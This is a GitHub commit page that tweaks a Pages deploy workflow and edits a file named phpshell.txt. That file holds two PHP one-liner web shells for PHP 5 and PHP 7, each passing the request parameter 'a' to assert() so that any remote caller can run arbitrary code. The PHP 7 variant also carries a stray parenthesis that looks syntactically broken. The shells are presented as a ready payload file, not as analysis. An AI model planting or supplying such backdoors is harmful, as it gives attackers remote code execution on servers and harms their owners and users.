Skip to content

Commit 98d9f7f

Browse files
author
runshell
committed
modified: .github/workflows/deploy.yml
modified: public/phpshell.txt
1 parent 136056a commit 98d9f7f

File tree

2 files changed

+3
-3
lines changed

2 files changed

+3
-3
lines changed

.github/workflows/deploy.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,4 +17,4 @@ jobs:
1717
with:
1818
github_token: ${{ secrets.GITHUB_TOKEN }}
1919
publish_dir: ./public # 替换为 master 分支中你要关联的目录
20-
publish_branch: gh-pages
20+
publish_branch: gh-page

public/phpshell.txt

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,9 @@
1-
//php5
1+
22
<?php
33
$a='assert';
44
[""=>$a($_REQUEST['a'])];
55
?>
6-
//php7
6+
77
<?php
88
'assert'($_REQUEST['a']));
99
?>

0 commit comments

Comments
 (0)